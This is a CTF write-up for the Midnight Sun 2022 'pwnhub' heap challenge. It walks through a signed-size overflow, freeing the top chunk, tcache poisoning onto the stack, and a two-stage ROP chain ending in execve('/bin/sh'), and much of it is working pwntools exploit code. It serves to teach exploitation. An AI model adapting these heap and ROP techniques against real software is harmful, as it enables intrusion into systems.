pwnhub
- Event: Midnight Sun CTF 2022 Quals
- Category: pwn
- Solves: 8
- Points: 588
Preliminary
To understand this article you need to have a basic knowledge about
heap exploitaion. I recommend you to read
my blog post about tcache
and also dhavalkapil.
I will use tcache poisoning
and some others attacks that don’t have
a name.
Also it’s good to look at malloc.c sources
Vulnerability
The challenge files can be downloaded from here.
The archive consists of following files: main binary, libc, ld, libdl.so.2
and config.h
. I don’t know why we got last 2 files and what it changes,
also I checked out the latter file and it looked
for me like a standard configurarion file so at this point I stopped paying any attention
to them.
Let’s check out the code.
There is a structure:
There are only 3 operations.
We can write data to the buffer:
We can show the address of a buffer:
And we can allocate a new buffer - the old one is not freed, it is “forgotten”:
You can see vulnerabilities here - the binary mallocs size+1
bytes but size
is stored.
During the comparison size <= 128
it treats it as a signed integer
, so the check will pass for
a value less than 0. malloc()
and read()
takes the size/count argument
as an unsigned number
.
In the case we provide -1
value, malloc(0)
will be called and
in reality this will create a heap chunk of the size 0x20
(0x18 bytes
for data and 0x8 bytes for the size field) because this is the smallest possible chunk.
The size will be stored as 0xffffffff
.
This is the only one allocation case that can be used for memory corruption.
Before allocate operation is called this is how the structure is initialized:
So at the beginning ptr points to the stack and it gives us stack leak which will be helpful later.
Let’s create a few helper python functions to communicate with a process:
def alloc(size):
r.sendline("3")
r.recvuntil("size: ")
r.sendline(str(size-1))
r.recvuntil("> ")
def leak():
r.sendline("2")
data = r.recvuntil("> ")
data = data.split(b"\n")[0]
data = data.split(b"leak: ")[1]
leak = u64(data.ljust(8,b"\x00"))
return leak
def save(data):
r.sendline("1")
time.sleep(0.2)
r.send(data)
r.recvuntil("> ")
And let’s leak the stack:
r.recvuntil("> ")
print("STACK PTR:")
stack = leak()
print(hex(stack))
Glibc version
To check what’s the version of glibc I usually do strings libc.so.6 | grep LIBC
,
If we see something similiar to this:
...
GLIBC_2.25
GLIBC_2.26
GLIBC_2.27
GLIBC_2.28
GLIBC_2.29
GLIBC_2.30
GLIBC_PRIVATE
it means that the version is 2.30
.
Creating freed chunks on the heap
We can overflow the buffer only on the newest chunk we created, yes, it’s
possible to overwrite size of the top chunk to a bigger value like
in house of force
but this attack does not work any longer.
So what about overwriting the size to the smaller value?
I’ve found house of orange attack which does this at the beginning (only this part of house of orange is helpful for our challenge).
The House of Orange starts with the assumption that a buffer overflow exists on the heap
using which the Top (also called the Wilderness) chunk can be corrupted.
At the beginning of execution, the entire heap is part of the Top chunk.
The first allocations are usually pieces of the Top chunk that are broken off to service the request.
Thus, with every allocation, the Top chunks keeps getting smaller.
And in a situation where the size of the Top chunk is smaller than the requested value,
there are two possibilities:
1) Extend the Top chunk
2) Mmap a new page
If the size requested is smaller than 0x21000, then the former is followed.
Now we request a chunk of size larger than the size of the Top chunk.
Malloc tries to service this request by extending the Top chunk
This forces sysmalloc to be invoked.
And the old Top chunk gets freed
It means that we can create freed chunks on the heap which we can overwrite
later!
The technique from this example is prepared for older version of glibc - 2.23
.
It’s 2.30
in this challenge so it will be a bit different - the freed chunk
will go to tcache bin.
I think that creating a freed chunk should be also possible without
overwriting the size of the Top
chunk but
we would need to make a lot of allocations to finish the space of the Top
chunk and this can take a lot of time.
I made some tests and when overwriting the size, we must left the last
hex digits unmodified, for example when the size is 0x21f71
we can
overwrite it to 0xf71
. Otherwise we crash a program.
Preparations for tcache poisoning
The next step is to think out how to prepare for a tcache poisoning attack.
We need to create some freed chunks, let’s focus on 2 chunks now, we will call
them A
and B
.
B
needs to placed at higher address than A
and it must go to tcache bin.
It will be overwritten by doing buffer overflow on A
- we are doing tcache poisoning.
We can do BO only on a chunk which we got by malloc(0)
so
we can’t make it to go to tcache bin because malloc(0)
now would allocate this chunk and
we need it for later. So let’s make it to be an unsortedbin or a smallbin.
Also, we need to create chunk C
that will go the the same tcache
bin as B
before B
is freed, because this is how tcache poisoning
attack work.
We want the heap to look more or less like this:
heap:
lower addresses [C ] [A] [B] higher addresses
unsortedbin or smallbin: <- A
tcache[x]: <- B <- C
We need to choose sizes for C and B
and A
.
I decided that C
and B
will have the size of 0x80
bytes.
For C
I picked 0x40
and this is the smallest possible number for this
attack to work.
Let’s create C
at the beginning because it won’t be making any problems:
alloc(0)
save(b"a"*24+p64(0xd51)) #overwrite the top chunk
for i in range(22):
alloc(129)
alloc(0x48) #no space for the next chunk
alloc(129) #the old top is freed
print("---------- 0x80 chunk in tcache")
It’s time to create a smallbin A
but how to do this?
I did something similiar to the code above and looped 8 times.
In the code below I freed 8 chunks of size 0x40
, first 7 went to
tcache bin, eighth went to fastbin:
for i in range(8):
alloc(0)
save(b"a"*24+p64(0xf51))
for i in range(26):
alloc(129)
alloc(0x48)
alloc(129)
At this point we have following bins:
Tcachebins[idx=2, size=0x40] count=7 ...
Tcachebins[idx=6, size=0x80] count=1 ← C
Fastbins[idx=2, size=0x40] count=1 ← A
Now we need to trigger malloc_consolidate
internal heap function. It just puts fastbins into unsortedbin.
You can see in the source code of malloc.c that it’s triggered when allocating a chunk and there aren’t any good matches in any bin and the Top chunk isn’t big enough:
Let’s create chunk B
right now - the second chunk in tcachebin of the size of 0x80
.
If we follow the same procedure as above to free the Top, we will get it, and also our chunk in fastbin
will go into smallbin (malloc_consolidate
puts it to unsorted bin but later it’s searching for a chunk that doesn’t match any bin so our chunk from unsorted bin goes to small bin)
alloc(0)
save(b"a"*24+p64(0xf51))
for i in range(25):
alloc(129)
alloc(0x68)
alloc(0x28)
save(p64(0x21f80)*2)#size and prev_size of a fake_chunk
alloc(129)
save(p64(0x21f80)*2)
I will explain this later.
The current status of bins:
Tcachebins[idx=2, size=0x40] count=7 ...
Tcachebins[idx=6, size=0x80] count=2 ← B ← C
[+] small_bins: A
The next line:
alloc(0)
The smallest possible size of a chunk is 0x20
, so in reality we will get
a chunk with 0x18
bytes for a data and 0x8
bytes for a size field.
This time a chunk is not taken from the top but from a smallbin, it’s size is 0x40
so it will be split into 2 chunks of the size 0x20
bytes.
That’s why this attack won’t work for a smaller chunk than 0x40
- it won’t split into 2 chunks.
Malloc returns the first half of the chunk, the second part will go into unsorted bin.
Currently it looks something like this:
heap:
lower addresses [C ] [A1][A2] [B] higher addresses
Tcachebins[idx=2, size=0x40] count=7 ...
Tcachebins[idx=6, size=0x80] count=2 ← B ← C
[+] unsorted_bin: A2
With a buffer overflow in A1
.
Corrupting chunk in an unsorted bin
But overflowing chunk B
directly won’t work because read()
, even when called with count=0xffffffff
,
doesn’t read that much bytes over the internet.
So my idea I had at the beginning needs to be modified.
Then I got an idea to overflow the size of A2
to a very big chunk
so that by doing a lot of allocs in a loop we will be taking memory from this chunk all the time
so that we will be able to overwrite
chunk B
.
We need to create a fake chunk right after A2
to make this to work.
Size of a fake chunk must by any proper size of a chunk with PREV_INUSE
to be 0.
It’s prev_size
needs to be the same as the new size of the A2
.
Summing up it’s something like:
int main() {
printf("%s\n","hello");
uint64_t* victim = malloc(0x1000);
uint64_t* next = malloc(0x2000);
printf("malloc(0x1000): %p\n", victim);
printf("malloc(0x2000): %p\n", next);
free(victim);
victim[-1]=0x2001;//size
victim[0x2000/8-1]=0x20; //fake chunk's size
victim[0x2000/8-2]=0x2000; //fake chunk's prev size
char *lol = malloc(0x1500);
printf("malloc(0x1500): %p\n", lol);
}
$ ./unsorted
hello
malloc(0x1000): 0x55c8801556b0
malloc(0x2000): 0x55c8801566c0
malloc(0x1500): 0x55c8801556b0
0x1000
chunk is freed, its size is overwritten to 0x2000 | PREV_INUSE
and
the size of a fake chunk is 0x20
.
In the end we got 2 allocated chunks that are overlapped.
When I said that I explain save(p64(0x21f80)*2)
later - its just
a fake chunk right after A2
.
The next part of the exploit realizes this idea:
- overwrite the size of
A2
to0x21f80
. - make 1000 allocations from
A2
-
tcache poisoning
- overwriteB->next
to point to the return address from main.
save(b"a"*24+p64(0x21f80))
for i in range(1000):
alloc(129)
alloc(0)
ret_addr = stack + 0x10f
save(b"d"*0x38+p64(0x81)+p64(ret_addr))
#B->size=0x81,B->next=ret_addr
#and a standard allocation of 2 chunks
alloc(0x78)
alloc(0x78) #this points to the stack!
I was worried that we do 1000 alocations in a loop, wasn’t sure if the
exploit won’t be too slow because the time is only 1 minute.
But I asked a friend to buy VPS with the lowest possible pings to the server
and he gave me digital ocean VPS with pings of 0.6ms
!
ROP
At this point we can write ROP chain. Let’s build it.
Finally I sent 2 ROPs.
The first one leaks a libc address by calling puts@plt(puts@got)
and next it reads a second ROP by read()
There are not many useful simple gadgets in a binary so I used ret2csu technique
rop = b""
rop += p64(0x04015e3) #pop rdi
rop += p64(0x405018) #puts@got
rop += p64(0x4010B0) #puts@plt
rop += p64(0x4015DA)
rop += p64(0x0)
rop += p64(0x0)
rop += p64(0x0)#r12
rop += p64(stack+0x15f)#r13
rop += p64(0x1000)#r14
rop += p64(0x405038)#r15 read@plt
rop += p64(0x4015C0)
save(rop)
The second stage of ROP is just a typical ROP:
#leak puts address
r.sendline("4") #exit - return from main
leak = r.recvline()
leak = leak[:-1]
libc_puts = u64(leak.ljust(8,b"\x00"))
print(libc_puts)
#send second ROP
LIBC = ELF("./lib/libc.so.6")
libc_base = libc_puts - LIBC.symbols["puts"]
print(hex(libc_base))
LIBC.address = libc_base
binsh_addr = next(LIBC.search(b"/bin/sh\x00"))
rop = ROP(LIBC)
rop.execve(binsh_addr, 0, 0)
print(rop.dump())
payload = rop.chain()
r.send(payload)
r.interactive()
And we got a flag!
Here is full epxloit source